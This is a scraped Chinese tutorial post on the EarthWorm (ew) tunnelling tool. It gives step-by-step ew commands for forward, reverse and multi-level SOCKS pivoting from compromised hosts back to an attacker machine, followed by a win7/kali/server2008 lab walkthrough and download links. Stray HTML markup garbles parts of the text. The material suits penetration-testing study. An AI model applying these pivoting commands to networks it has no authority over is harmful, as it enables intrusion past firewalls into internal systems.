企业网站有什么用,阿里云域名如何做网站,开发一个公众号大概需要多少钱,国外 设计师 网站Earthworm的简单介绍#xff08;一#xff09;
文章目录
EarthWorm下载地址1. 普通网络 1.1 跳板机存在公网IP 1.1.1 网络环境1.1.2 使用方法1.1.3 流量走向 1.2 跳板机不存在公网IP#xff0c;可出网 1.2.1 网络环境1.2.2 使用方法1.2.3 流量走向 2. 二级网络 2.1 一级跳…Earthworm的简单介绍一
文章目录
EarthWorm下载地址1. 普通网络 1.1 跳板机存在公网IP 1.1.1 网络环境1.1.2 使用方法1.1.3 流量走向 1.2 跳板机不存在公网IP可出网 1.2.1 网络环境1.2.2 使用方法1.2.3 流量走向 2. 二级网络 2.1 一级跳板机有公网IP 2.1.1 网络环境2.1.2 使用方法2.1.3 流量走向 2.2 一级跳板机无公网IP 2.2.1 网络环境2.2.2 使用方法2.2.3 流量走向 3. 三级网络 3.1 网络环境3.2 使用方法3.3 流量走向 EarthWorm下载地址
https://github.com/AA8j/SecTools/tree/main/ew
1. 普通网络
在普通网络环境下可直接通过跳板机访问内网特定资源。
1.1 跳板机存在公网IP
1.1.1 网络环境
目标主机公网IP1.1.1.1可访问特定内网资源跳板机
1.1.2 使用方法
目标主机公网IP1.1.1.1可访问特定内网资源
ew -s ssocksd -l 88881
1
侦听本机的8888端口提供socks代理1
1
1.1.3 流量走向
本地主机---1.1.1.1:8888---特定内网资源1
1
1.2 跳板机不存在公网IP可出网
1.2.1 网络环境
攻击机公网IP1.1.1.1 目标主机B192.168.1.1可出网可访问特定内网资源跳板机
1.2.2 使用方法
攻击机公网IP1.1.1.1
ew -s rcsocks -l 1080 -e 88881
1
侦听1080端口提供socks代理
并且将1080的代理发送到8888端口此时也侦听8888端口等待反弹连接12
12
目标主机B192.168.1.1可出网跳板机
ew -s rssocks -d 1.1.1.1 -e 88881
1
主动连接1.1.1.1的8888端口打通隧道。1
1
1.2.3 流量走向
本地主机---1.1.1.1:1080----1.1.1.1:8888---192.168.1.1---特定内网资源1
1
2. 二级网络
在二级网络下一级跳板机不能访问特定内网资源二级跳板机可以访问内网特定资源。
2.1 一级跳板机有公网IP
2.1.1 网络环境
目标主机A公网IP1.1.1.1内网IP192.168.1.1可访问主机B不可访问特定内网资源一级跳板机 目标主机B内网IP172.16.1.1不出网可访问特定内网资源二级跳板机
2.1.2 使用方法
目标主机B内网IP172.16.1.1不出网可访问特定内网资源二级跳板机
ew -s ssocksd -l 99991
1
侦听9999端口提供socks代理1
1
目标主机A公网IP1.1.1.1内网IP192.168.1.1可访问主机B不可访问特定内网资源一级跳板机
ew -s lcx_tran -l 1080 -f 192.168.1.1 -g 99991
1
侦听本机1080端口并转发到172.16.1.1:99991
1
2.1.3 流量走向
本地主机---1.1.1.1:1080---172.16.1.1:9999---特定内网资源1
1
2.2 一级跳板机无公网IP
2.2.1 网络环境
攻击机公网IP1.1.1.1 目标主机A内网IP192.168.1.1出网可访问主机B不可访问特定内网资源一级跳板机 目标主机B内网IP172.16.1.1不出网可访问特定内网资源二级跳板机
2.2.2 使用方法
攻击机公网IP1.1.1.1
ew -s lcx_listen -l 1080 -e 88881
1
侦听1080端口提供socks代理
并且将1080的代理发送到8888端口此时也侦听8888端口等待反弹连接12
12
目标主机B内网IP172.16.1.1不出网可访问特定内网资源二级跳板机:
ew -s ssocksd -l 99991
1
侦听9999端口提供socks代理1
1
目标主机A内网IP192.168.1.1出网不可访问特定内网资源一级跳板机
ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 99991
1
将1.1.1.1:8888和172.16.1.1:9999双向建立连接打通隧道。1
1
2.2.3 流量走向
本地主机---1.1.1.1:1080---1.1.1.1:8888---192.168.1.1---172.16.1.1:9999---特定内网资源1
1
3. 三级网络
在二级网络下一级跳板机不能访问特定内网资源二级跳板机也不能访问三级跳板机才可以访问内网特定资源。
同上可以总结出一级跳板机肯定是要能出网的只是有公网IP和没有公网IP两种情况。
这里假设其没有公网IP有公网IP的情况参考二级网络更简单。
3.1 网络环境
攻击机公网IP1.1.1.1 目标主机B内网IP192.168.1.1出网可访问主机C不可访问特定内网资源一级跳板机 目标主机C内网IP172.16.1.1不出网可访问主机D不可访问特定内网资源二级跳板机 目标主机D内网IP10.1.1.1不出网可访问特定内网资源三级跳板机
3.2 使用方法
攻击机公网IP1.1.1.1
ew -s lcx_listen -l 1080 -e 88881
1
侦听1080端口提供socks代理
并且将1080的代理发送到8888端口此时也侦听8888端口等待反弹连接12
12
目标主机C内网IP172.16.1.1不出网不可访问特定内网资源二级跳板机
ew -s lcx_listen -l 9999 -e 77771
1
同样也是侦听9999端口提供socks代理
并且将9999的代理发送到7777端口此时也侦听7777端口等待反弹连接12
12
目标主机B内网IP192.168.1.1出网可访问主机C不可访问特定内网资源一级跳板机
ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 99991
1
访问攻击机的8888端口和内网172.16.1.1的9999端口将攻击机与C主机连通。1
1
目标主机D内网IP10.1.1.1不出网可访问特定内网资源三级跳板机
ew -s ssocksd -d 172.16.1.1 -e 77771
1
回连打通CD之间的隧道。1
1
3.3 流量走向
本地主机---1.1.1.1:1080---1.1.1.1:8888---192.168.1.1---172.16.1.1:9999---172.16.1.1:7777---10.1.1.1---内网特定资源1
1
参考链接http://rootkiter.com/EarthWorm/
Earthworm的简单介绍二 EW 是一套便携式的网络穿透工具具有 SOCKS v5服务架设和端口转发两大核心功能可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道直达网络深处用蚯蚓独有的手段突破网络限制给防火墙松土。工具包中提供了多种可执行文件以适用不同的操作系统Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。 (简称EW)是一套轻量便携且功能强大的网络穿透工具基于标准C开发具有socks5代理、端口转发和端口映射三大功能。 优点: 1.可穿透复杂的内网环境。这么说吧我本地连着路由器开一个虚拟机可以直接反弹到公网的云服务器上。 2.以支持多平台间的转接通讯Linux、Windows、MacOS、Arm-Linux均支持。 支持平台列表可跨平台反弹 div classhljs-ln-numbersdiv classhljs-ln-line hljs-ln-n/div/divdiv classhljs-ln-codediv classhljs-ln-lineew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP/div/div/lilidiv classhljs-ln-numbersdiv classhljs-ln-line hljs-ln-n/div/divdiv classhljs-ln-codediv classhljs-ln-lineew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)span classhljs-operator//spanBT5(X86)/div/div/lilidiv classhljs-ln-numbersdiv classhljs-ln-line hljs-ln-n/div/divdiv classhljs-ln-codediv classhljs-ln-lineew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)span classhljs-operator//spanKali(X64)/div/div/lilidiv classhljs-ln-numbersdiv classhljs-ln-line hljs-ln-n/div/divdiv classhljs-ln-codediv classhljs-ln-lineew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑苹果server/div/div/lilidiv classhljs-ln-numbersdiv classhljs-ln-line hljs-ln-n/div/divdiv classhljs-ln-codediv classhljs-ln-lineew_for_Arm32 常见Armspan classhljs-operator-/spanLinux系统 HTC span classhljs-keywordNew/span span classhljs-keywordOne/span(Armspan classhljs-operator-/spanAndroid)span classhljs-operator//span小米路由器(R1D)/div/div/lilidiv classhljs-ln-numbersdiv classhljs-ln-line hljs-ln-n/div/divdiv classhljs-ln-codediv classhljs-ln-lineew_mipsel 常见Mipsspan classhljs-operator-/spanLinux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)/div/div/li/ol1
项目地址:
https://github.com/idlefire/ew
利用:
打开项目的文件,里面非常清楚的写了如何使用,我们直接在里面复制命令使用即可 一:在win7添加转接隧道将 1080 收到的代理请求,转交给反连8888端口的主机 把ew_for_Win.exe文件放到win7中,然后该文件目录下执行./ew -s lcx_listen -l 1080 -e 8888 二:在kali主机上利用ssocksd方式启动9999端口的socks代理 把ew_for_linux64放到kali中,然后该文件目录下执行./ew -s ssocksd -l 9999 三:在 server2008主机上通过工具的 lcx_slave 方式打通win7 8888端口 和 kali 9999端口 之间的通讯隧道 同样把ew_for_win文件放进server2008主机上,在该文件目录下执行./ew -s lcx_slave -d 192.168.1.48 -e 8888 -f 192.168.1.49 -g 9999 四:kali主机输入python3 -m http.server 8988,然后kali本地区访问该端口 五:利用 proxifier工具,配置代理服务器,从而让主机访问自身的80端口,又因为配置了规则,此时将127.0.0.1转发给192.168.1.48的1080 再由192.168.1.48的1080端口转发给kali linux 六:设置转发规则 七:通过访问本地的8988端口,就可以访问kali linux任意端口